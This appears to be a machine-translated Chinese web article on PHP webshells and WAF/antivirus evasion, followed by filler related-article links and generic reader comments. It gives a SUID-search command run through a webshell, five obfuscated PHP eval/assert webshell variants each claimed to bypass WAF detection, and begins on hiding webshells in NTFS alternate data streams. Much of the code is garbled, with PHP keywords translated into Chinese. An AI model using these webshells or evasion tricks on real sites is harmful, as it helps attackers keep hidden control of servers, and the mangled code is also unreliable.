下面介绍一下使用SUID提权的方法
1、使用以下命令查找本机有SUID权限的文件
test.php?cmd=system( "find/-user root -perm -4000 -print 2/dev/null");
SUID权限查找功能使用流程
免杀
目前的安全产品都是采用正则匹配的方式进行木马查杀。因此,我们要想免杀,首先要知道安全防护软件搭配什么。
eval是一个危险的函数,但它并不是一个简单的知识匹配eval。通过测试,发现tamcun的eval不会被过滤,实际过滤的内容是
image.png
免杀-常量定义
?php Define("a","$_REQUEST[cmd]");eval(a);上面的代码通过定义一个常量将eval 与(美元符号+短下划线)REQUEST 结合起来。分裂
测试此代码可以绕过WAF检查
同时执行过程中a会被$_REQUEST[cmd]替换。
能够完成Webshell的功能
免杀-定义函数
?php
函数a($a)
{
返回$a;
}
eval(a($_REQUEST)["cmd"]);
?上面的代码通过定义一个函数来拆分eval和(美元符号)+_REQUEST
检测此代码可以绕过WAF检查
通过自定义函数输出(美元符号)+ _REQUEST,并将eval 与(美元符号)+ _REQUEST 分开
免杀-定义类
?php
用户类
{
公共$名称="";
函数_destruct()
{
eval("$这个名字");
}
}
?析构类时会调用_destruct()方法,该方法的作用是调用eval来执行name中的内容。 name被赋值为值(美元符号)+_REQUEST["cmd"],表示该类在销毁时被调用了eval($_REQUEST["cmd"])
上面的代码通过定义类的magic 方法将eval 与(美元符号) + _REQUEST 拆分
检测此代码可以绕过WAF检查
免杀-多方式传参
?php
$COOKIE=$_COOKIE;
foreach($COOKIE 为$key=$value)
{
if($key=="断言")
{
$key($_REQUEST["cmd"]) ;
}
}
上面的代码需要结合向脚本传递参数才能够使用Webshell出租,这是一种比较强的绕过方法。
免杀-特殊调用
使用特殊的调用方法来断言函数
?php
$a=get_define_functions();
$a["内部"][841]($_REQUEST["cmd"]);
经测试,该方法可以绕过WAF检查。
具体原因:
image.png
隐藏Webshell
NTFS交换数据流
1.它是NTFS磁盘的一个特性
2.主流文档和非主流文档有区别
3、主文件流直接可见;非主文件流托管在主文件流中,无法直接读取。这个非主文件流就是NTFS交换数据流。
4.格式
【深入解析:网络攻击工具Webshell及其免杀技术揭秘】相关文章:
2.米颠拜石
3.王羲之临池学书
8.郑板桥轶事十则
用户评论
真的了解webshell吗?平时怎么用的比较多?
有6位网友表示赞同!
什么网站会用到webshell啊?给我一些例子吧
有8位网友表示赞同!
免杀技术太厉害了吧!现在哪个工具比较好?
有12位网友表示赞同!
学ウェブシェル应该怎么做?我听说有点难?
有5位网友表示赞同!
有不会被检测到的webshell吗?
有8位网友表示赞同!
免杀真的有效吗?会不会被安全人员发现啊?
有14位网友表示赞同!
免杀技术是不是违法行为呢?有什么法律风险吗?
有10位网友表示赞同!
我想学习一下webshell,从哪里可以找资料比较合适呀?
有12位网友表示赞同!
有没有一些 webshell 利用方法和技巧的分享啊?
有7位网友表示赞同!
免杀方式有哪些分类?
有13位网友表示赞同!
我听说一些专业的黑客小组,他们有自己开发Webshell 和免杀手段吗?
有8位网友表示赞同!
webshell的代码结构是什么样子的?有什么需要注意的地方?
有16位网友表示赞同!
最近几年安全软件变得越来越厉害了,免杀变得更难了吗?
有18位网友表示赞同!
学习webshell要掌握哪些编程语言?
有14位网友表示赞同!
我想了解一下免杀技术的原理,可以让我知道它们是怎么运作的?
有19位网友表示赞同!
在使用webshell的时候有哪些安全风险需要注意呢?
有10位网友表示赞同!
有没有什么方法可以检测到webshell的存在?
有10位网友表示赞同!
"学习webshell"被很多人误解成坏事,其实它也是一种学习セキュリティ的一种方式吗?
有8位网友表示赞同!